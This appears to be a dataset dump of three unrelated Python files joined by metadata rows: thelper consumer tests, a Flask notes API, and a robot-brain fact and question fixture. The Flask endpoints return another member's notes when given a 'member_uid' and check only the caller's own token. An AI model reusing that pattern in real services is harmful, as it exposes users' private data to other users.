targets.append(torch.randint(low=0, high=class_count, size=(curr_batch_size, )))
preds.append(torch.rand((curr_batch_size, class_count)))
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(curr_batch_size)]},
None, iter_idx, iter_count, 0, 1)
tot_idx += curr_batch_size
report = consumer.report()
assert report is not None and isinstance(report, str)
assert len(report.split("\n")) == 11 # 10 lines + header
assert "target_name,target_score,pred_1_name,pred_1_score,pred_2_name," \
"pred_2_score,pred_3_name,pred_3_score,idx" == report.split("\n")[0]
consumer.reset()
assert consumer.report() is None
consumer.class_names = None
tot_idx = 0
for iter_idx in range(iter_count):
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(targets[iter_idx].shape[0])]},
None, iter_idx, iter_count, 0, 1)
tot_idx += targets[iter_idx].shape[0]
assert consumer.report() == report
def test_classif_report():
# classification results are expected in 1D format; lets build some dummy data...
batch_size = 16
iter_count = 32
input_shape = (3, 32, 32)
class_count = 10
class_names = [str(i) for i in range(class_count)]
task = thelper.tasks.Classification(class_names, "input", "gt", ["idx"])
consumer_config = {"consumer": {
"type": "thelper.train.utils.ClassifReport",
"params": {"class_names": class_names}
}}
consumers = thelper.train.create_consumers(consumer_config)
consumer = consumers["consumer"]
assert isinstance(consumer, thelper.train.utils.ClassifReport)
assert consumer.class_names == class_names
assert consumer.report() is None
assert repr(consumer)
inputs, targets, preds = [], [], []
tot_idx = 0
for iter_idx in range(iter_count):
# set batch size to one for 'lingering' sample in last minibatch
curr_batch_size = batch_size if iter_idx < iter_count - 1 else 1
inputs.append(torch.randn((curr_batch_size, *input_shape)))
targets.append(torch.randint(low=0, high=class_count, size=(curr_batch_size, )))
preds.append(torch.rand((curr_batch_size, class_count)))
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(curr_batch_size)]},
None, iter_idx, iter_count, 0, 1)
tot_idx += curr_batch_size
report = consumer.report()
assert report is not None and isinstance(report, str)
assert report.endswith(f"{tot_idx}\n") # should be total number of samples in last cell
consumer.reset()
assert consumer.report() is None
consumer.class_names = None
tot_idx = 0
for iter_idx in range(iter_count):
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(targets[iter_idx].shape[0])]},
None, iter_idx, iter_count, 0, 1)
tot_idx += targets[iter_idx].shape[0]
assert consumer.report() == report
def test_confmat():
# classification results are expected in 1D format; lets build some dummy data...
batch_size = 16
iter_count = 32
input_shape = (3, 32, 32)
class_count = 10
class_names = [str(i) for i in range(class_count)]
task = thelper.tasks.Classification(class_names, "input", "gt", ["idx"])
consumer_config = {"consumer": {
"type": "thelper.train.utils.ConfusionMatrix",
"params": {"class_names": class_names}
}}
consumers = thelper.train.create_consumers(consumer_config)
consumer = consumers["consumer"]
assert isinstance(consumer, thelper.train.utils.ConfusionMatrix)
assert consumer.class_names == class_names
assert consumer.report() is None
assert repr(consumer)
inputs, targets, preds = [], [], []
tot_idx = 0
for iter_idx in range(iter_count):
# set batch size to one for 'lingering' sample in last minibatch
curr_batch_size = batch_size if iter_idx < iter_count - 1 else 1
inputs.append(torch.randn((curr_batch_size, *input_shape)))
targets.append(torch.randint(low=0, high=class_count, size=(curr_batch_size, )))
preds.append(torch.rand((curr_batch_size, class_count)))
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(curr_batch_size)]},
None, iter_idx, iter_count, 0, 1)
tot_idx += curr_batch_size
report = consumer.report()
assert report is not None and isinstance(report, str)
assert report.endswith(f"{tot_idx}\n") # should be total number of samples in last cell
render = consumer.render()
assert render is None or isinstance(render, np.ndarray)
consumer.reset()
assert consumer.report() is None
consumer.class_names = None
tot_idx = 0
for iter_idx in range(iter_count):
consumer.update(task, inputs[iter_idx], preds[iter_idx], targets[iter_idx],
{"idx": [tot_idx + idx for idx in range(targets[iter_idx].shape[0])]},
None, iter_idx, iter_count, 0, 1)
tot_idx += targets[iter_idx].shape[0]
assert consumer.report() == report
| 46.285714
| 94
| 0.653733
| 923
| 6,804
| 4.612134
| 0.122427
| 0.06413
| 0.054968
| 0.033827
| 0.892882
| 0.892882
| 0.892882
| 0.892882
| 0.892882
| 0.892882
| 0
| 0.016415
| 0.230012
| 6,804
| 146
| 95
| 46.60274
| 0.796144
| 0.079365
| 0
| 0.842105
| 0
| 0
| 0.066677
| 0.032619
| 0
| 0
| 0
| 0
| 0.210526
| 1
| 0.022556
| false
| 0
| 0.022556
| 0
| 0.045113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bd7384cb7cb028da04a1facc3162b646c9ad07c
| 12,233
|
py
|
Python
|
api/notes.py
|
ThinkmanWang/NotesServer
|
86a1f7f56b30f94aaccd3d70941e3873cc1713e2
|
[
"Apache-2.0"
] | null | null | null |
api/notes.py
|
ThinkmanWang/NotesServer
|
86a1f7f56b30f94aaccd3d70941e3873cc1713e2
|
[
"Apache-2.0"
] | 1
|
2021-06-01T21:40:51.000Z
|
2021-06-01T21:40:51.000Z
|
api/notes.py
|
ThinkmanWang/NotesServer
|
86a1f7f56b30f94aaccd3d70941e3873cc1713e2
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'models'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'utils'))
from imp import reload
import MySQLdb
import json
import hashlib
import time
import uuid
from flask import Flask, render_template, request, redirect, url_for, send_from_directory
from flask import render_template
from werkzeug import secure_filename
from utils.mysql_python import MysqlPython
from utils.object2json import obj2json
from models.RetModel import RetModel
from utils.user_db_utils import *
from utils.note_db_utils import *
from error_code import *
from flask import Blueprint
notes_api = Blueprint('notes_api', __name__)
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'models'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'utils'))
#For notes
@notes_api.route("/api/get_notes_list", methods=['POST', 'GET'])
def get_notes_list():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('limit', None) is None or request.form.get('offset', None) is None):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (False == request.form['limit'].isdigit() or False == request.form['offset'].isdigit()):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (request.form.get('member_uid', None) is not None):
lstNoteId = select_note_list(request.form['member_uid'], int(request.form['limit']), int(request.form['offset']), request.form.get('type', '0'))
szRet = obj2json(RetModel(0, dict_err_code[0], lstNoteId) )
return szRet
else:
lstNoteId = select_note_list(request.form['uid'], request.form['limit'], request.form['offset'], request.form.get('type', '0'))
szRet = obj2json(RetModel(0, dict_err_code[0], lstNoteId) )
return szRet
@notes_api.route("/api/get_note", methods=['POST', 'GET'])
def get_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
note = select_note(request.form['uid'], request.form['id'])
szRet = ""
if (note is None):
szRet = obj2json(RetModel(40, dict_err_code[40], {}) )
else:
szRet = obj2json(RetModel(0, dict_err_code[0], note) )
return szRet
@notes_api.route("/api/add_note", methods=['POST', 'GET'])
def add_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
if (request.form.get('date', None) is None):
return obj2json(RetModel(42, dict_err_code[42], {}) )
if (request.form.get('customer_id', None) is None):
return obj2json(RetModel(31, dict_err_code[31], {}) )
if (request.form.get('address', None) is None):
return obj2json(RetModel(43, dict_err_code[43], {}) )
if (request.form.get('longitude', None) is None):
return obj2json(RetModel(44, dict_err_code[44], {}) )
if (request.form.get('latitude', None) is None):
return obj2json(RetModel(45, dict_err_code[45], {}) )
if (request.form.get('note', None) is None):
return obj2json(RetModel(40, dict_err_code[40], {}) )
note = {}
note["id"] = request.form['id']
note["uid"] = request.form['uid']
note["date"] = request.form['date']
note["update_date"] = request.form.get('update_date', int(time.time()))
note["customer_id"] = request.form['customer_id']
note["address"] = request.form['address']
note["longitude"] = request.form['longitude']
note["latitude"] = request.form['latitude']
note["note"] = request.form['note']
note["thumbnail"] = request.form.get('thumbnail', '')
note["pic"] = request.form.get('pic', '')
if (True == insert_note(request.form['uid'], note)):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@notes_api.route("/api/update_note", methods=['POST', 'GET'])
def update_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
if (request.form.get('date', None) is None):
return obj2json(RetModel(42, dict_err_code[42], {}) )
if (request.form.get('customer_id', None) is None):
return obj2json(RetModel(31, dict_err_code[31], {}) )
if (request.form.get('address', None) is None):
return obj2json(RetModel(43, dict_err_code[43], {}) )
if (request.form.get('longitude', None) is None):
return obj2json(RetModel(44, dict_err_code[44], {}) )
if (request.form.get('latitude', None) is None):
return obj2json(RetModel(45, dict_err_code[45], {}) )
if (request.form.get('note', None) is None):
return obj2json(RetModel(40, dict_err_code[40], {}) )
note = {}
note["id"] = request.form['id']
note["uid"] = request.form['uid']
note["date"] = request.form['date']
note["update_date"] = request.form.get('update_date', int(time.time()))
note["customer_id"] = request.form['customer_id']
note["address"] = request.form['address']
note["longitude"] = request.form['longitude']
note["latitude"] = request.form['latitude']
note["note"] = request.form['note']
note["thumbnail"] = request.form.get('thumbnail', '')
note["pic"] = request.form.get('pic', '')
szRet = ''
if (False == if_note_exists(note)):
szRet = obj2json(RetModel(40, dict_err_code[40], {}) )
else:
if (True == update_note_info(request.form['uid'], note)):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
@notes_api.route("/api/delete_note", methods=['POST', 'GET'])
def delete_note():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41]))
if (remove_note(request.form['uid'], request.form['id'])):
return obj2json(RetModel(0, dict_err_code[0], {}) )
else:
return obj2json(RetModel(1000, dict_err_code[1000], {}) )
#for get all posts from my team & mine & public to me
@notes_api.route("/api/get_posts", methods=['POST', 'GET'])
def get_posts():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('limit', None) is None or request.form.get('offset', None) is None):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (False == request.form['limit'].isdigit() or False == request.form['offset'].isdigit()):
return obj2json(RetModel(46, dict_err_code[46], {}) )
if (request.form.get('member_uid', None) is not None):
lstNotes = select_note_for_member(request.form['member_uid'], request.form['limit'], request.form['offset'])
szRet = obj2json(RetModel(0, dict_err_code[0], lstNotes) )
return szRet
else:
lstNotes = db_query_posts_public_to_me(request.form['uid'], request.form['limit'], request.form['offset'])
szRet = obj2json(RetModel(0, dict_err_code[0], lstNotes) )
return szRet
#for repost notes
@notes_api.route("/api/repost", methods=['POST', 'GET'])
def repost():
if request.method == 'GET':
return obj2json(RetModel(1, dict_err_code[1], {}) )
if (request.form.get('uid', None) is None or request.form.get('token', None) is None):
return obj2json(RetModel(21, dict_err_code[21]))
if (False == verify_user_token(request.form['uid'], request.form['token'])):
return obj2json(RetModel(21, dict_err_code[21], {}) )
if (request.form.get('id', None) is None):
return obj2json(RetModel(41, dict_err_code[41], {}) )
if (request.form.get('address', None) is None):
return obj2json(RetModel(43, dict_err_code[43], {}) )
if (request.form.get('longitude', None) is None):
return obj2json(RetModel(44, dict_err_code[44], {}) )
if (request.form.get('latitude', None) is None):
return obj2json(RetModel(45, dict_err_code[45], {}) )
if (request.form.get('customer_id', None) is None):
return obj2json(RetModel(31, dict_err_code[31], {}) )
if (request.form.get('note', None) is None):
return obj2json(RetModel(40, dict_err_code[40], {}) )
if (request.form.get('repost_from', None) is None):
return obj2json(RetModel(47, dict_err_code[47], {}) )
note = {}
note["id"] = request.form['id']
note["uid"] = request.form['uid']
note["date"] = request.form.get('date', int(time.time()))
note["update_date"] = request.form.get('update_date', int(time.time()))
note["customer_id"] = request.form['customer_id']
note["address"] = request.form['address']
note["longitude"] = request.form['longitude']
note["latitude"] = request.form['latitude']
note["note"] = request.form['note']
note["thumbnail"] = request.form.get('thumbnail', '')
note["pic"] = request.form.get('pic', '')
note["repost_from"] = request.form.get('repost_from', '0')
if (True == db_repost_note(request.form['uid'], note)):
szRet = obj2json(RetModel(0, dict_err_code[0], {}) )
else:
szRet = obj2json(RetModel(1000, dict_err_code[1000], {}) )
return szRet
| 40.506623
| 153
| 0.599281
| 1,578
| 12,233
| 4.49493
| 0.072877
| 0.179896
| 0.097702
| 0.076695
| 0.878754
| 0.842521
| 0.823911
| 0.810235
| 0.80079
| 0.78373
| 0
| 0.03233
| 0.231341
| 12,233
| 301
| 154
| 40.641196
| 0.722004
| 0.006294
| 0
| 0.75
| 0
| 0
| 0.091216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032407
| false
| 0
| 0.083333
| 0
| 0.384259
| 0.009259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50031227e7112f6292fd3902da07c0768be0bc3e
| 25,966
|
py
|
Python
|
pepper/brain/utils/base_cases.py
|
neelrast/pepper-depression-module
|
d36ab123d9ce32d1647b6473b10a5f1ee30a251d
|
[
"MIT"
] | null | null | null |
pepper/brain/utils/base_cases.py
|
neelrast/pepper-depression-module
|
d36ab123d9ce32d1647b6473b10a5f1ee30a251d
|
[
"MIT"
] | null | null | null |
pepper/brain/utils/base_cases.py
|
neelrast/pepper-depression-module
|
d36ab123d9ce32d1647b6473b10a5f1ee30a251d
|
[
"MIT"
] | null | null | null |
from datetime import date
statements = [
{ # lenka is from Serbia
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "serbia",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 1,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram is from the netherlands
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 2,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene is from mexico
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "mexico",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 3,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek is from the netherlands
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 4,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene K is from the netherlands
"subject": {
"label": "selene_k",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 5,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes goulash
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "goulash",
"type": "dish"
},
"author": "selene",
"chat": 1,
"turn": 6,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes The Big Lebowski
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "the_big_lebowski",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 7,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes baseball
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "baseball",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 8,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram likes romantic movies
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "romantic_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 9,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes ice cream
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "ice_cream",
"type": "dish"
},
"author": "selene",
"chat": 1,
"turn": 10,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes Harry Potter
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "harry_potter",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 11,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes acrobatics
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "acrobatics",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 12,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka likes action movies
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "action_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 13,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes balkenbrij
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "balkenbrij",
"type": "dish"
},
"author": "selene",
"chat": 1,
"turn": 14,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes 2001 A Space Odyssey
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "2001_a_space_odyssey",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 15,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes soccer
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "soccer",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 16,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # piek likes horror movies
"subject": {
"label": "piek",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "horror_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 17,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes tacos
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "tacos",
"type": "dish"
},
"author": "selene",
"chat": 1,
"turn": 18,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes Coco
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "coco",
"type": "movie"
},
"author": "selene",
"chat": 1,
"turn": 19,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes soccer
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "soccer",
"type": "sport"
},
"author": "selene",
"chat": 1,
"turn": 20,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # selene likes animated movies
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "likes"
},
"object": {
"label": "animated_movies",
"type": "film_genre"
},
"author": "selene",
"chat": 1,
"turn": 21,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # bram knows lenka
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "knows"
},
"object": {
"label": "lenka",
"type": "person"
},
"author": "selene",
"chat": 1,
"turn": 22,
"position": "0-16",
"date": date(2018, 3, 19)
},
{ # Leolani is from France
"subject": {
"label": "leolani",
"type": "robot"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "france",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 23,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # Leolani is from Japan
"subject": {
"label": "leolani",
"type": "robot"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "japan",
"type": "location"
},
"author": "selene",
"chat": 1,
"turn": 24,
"position": "0-25",
"date": date(2018, 3, 19)
},
{ # lenka mother is ljubica (lenka)
u'predicate': {u'type': u'mother_is'},
u'chat': u'',
u'author': u'lenka',
u'object': {u'type': u'', u'id': u'', u'label': u'ljubica'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'lenka'}
},
{ # bram likes action movies (bram)
u'predicate': {u'type': u'likes'},
u'chat': u'',
u'author': u'bram',
u'object': {u'type': u'', u'id': u'', u'label': u'action_movies'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # bram likes romantic movies (selene)
u'predicate': {u'type': u'likes'},
u'chat': u'',
u'author': u'selene',
u'object': {u'type': u'', u'id': u'', u'label': u'romantic_movies'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # bram is_from Italy (selene)
u'predicate': {u'type': u'is_from'},
u'chat': u'',
u'author': u'selene',
u'object': {u'type': u'location', u'id': u'', u'label': u'italy'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # lenka favorite food-is cake (lenka)
u'predicate': {u'type': u'favorite'},
u'chat': u'',
u'author': u'lenka',
u'object': {u'type': u'', u'id': u'', u'label': u'cake'},
u'turn': u'',
u'utterance_type': u'statement',
u'date': date(2018, 3, 19),
u'position': u'0-25',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'lenka'}
}
]
questions = [
{
u'predicate': {u'type': 'is_from'},
u'chat': 0,
u'author': u'jo',
u'object': {u'type': u'', u'id': u'', u'label': ''},
u'turn': 7, u'utterance_type': 'question',
u'date': '',
u'position': u'',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}},
{ # Who is from the Serbia? -> lenka, selene
"subject": {
"label": "",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "serbia",
"type": "location"
}
},
{ # Where is lenka from? -> Serbia, selene
"subject": {
"label": "lenka",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "",
"type": "location"
}
},
{ # Does selene know piek? -> (yes) selene
"subject": {
"label": "selene",
"type": "person"
},
"predicate": {
"type": "knows"
},
"object": {
"label": "piek",
"type": "person"
}
},
{ # Is bram from the netherlands? -> (idk) empty
"subject": {
"label": "bram",
"type": "person"
},
"predicate": {
"type": "is_from"
},
"object": {
"label": "netherlands",
"type": "location"
}
},
{ # bram knows Beyonce
u'predicate':
{u'type': u'knows'},
u'chat': u'',
u'author': u'person',
u'object':
{u'type': u'', u'id': u'', u'label': u'beyonce'},
u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19),
u'position': u'',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'bram'}
},
{ # Leolani knows bram
u'predicate': {u'type': u'knows'}, u'chat': u'', u'author': u'bram',
u'object': {u'type': u'person', u'id': u'', u'label': u'bram'}, u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'leolani'}
},
{ # selene knows piek
u'predicate': {u'type': u'knows'}, u'chat': u'', u'author': u'person',
u'object': {u'type': u'person', u'id': u'', u'label': u'piek'}, u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'selene'}
},
{ # Where is Leolani from?
u'predicate': {u'type': u'is_from'}, u'chat': u'', u'author': u'person',
u'object': {u'type': u'', u'id': u'', u'label': u''}, u'turn': u'', u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'leolani'}
},
{ # Who is from italy
u'predicate': {u'type': u'is_from'}, u'chat': u'', u'author': u'jill',
u'object': {u'type': u'', u'id': u'', u'label': u'italy'}, u'turn': u'', u'utterance_type': u'question',
u'date': date(2018, 3, 19), u'position': u'', u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u''}
},
{ # what does piek like (jo)
u'predicate': {u'type': u'likes'},
u'chat': u'',
u'author': u'jo',
u'object': {u'type': u'', u'id': u'', u'label': u''},
u'turn': u'',
u'utterance_type': u'question',
u'date': date(2018, 3, 19),
u'position': u'',
u'response': {u'role': u'', u'format': u''},
u'subject': {u'type': u'', u'id': u'', u'label': u'piek'}
}
]
experiences = [
{ # Leolani saw an apple
"subject": {
"label": "",
"type": ""
},
"predicate": {
"type": ""
},
"object": {
"label": "apple",
"type": "fruit"
},
"author": "front_camera",
"chat": None,
"turn": None,
"position": "0-15-0-15",
"date": date(2018, 3, 19)
}
]
visuals = [
['tv', "carpenter's kit", 'tool kit'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['laptop', 'laptop', 'laptop computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['laptop', 'laptop', 'laptop computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'printer'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['chair', 'desk'],
['chair', 'desk'],
['chair', 'desk'],
['laptop', 'notebook', 'notebook computer'],
['potted plant', 'pot', 'flowerpot'],
['tv', "carpenter's kit", 'tool kit'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['tv', 'espresso maker'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
['potted plant', 'pot', 'flowerpot'],
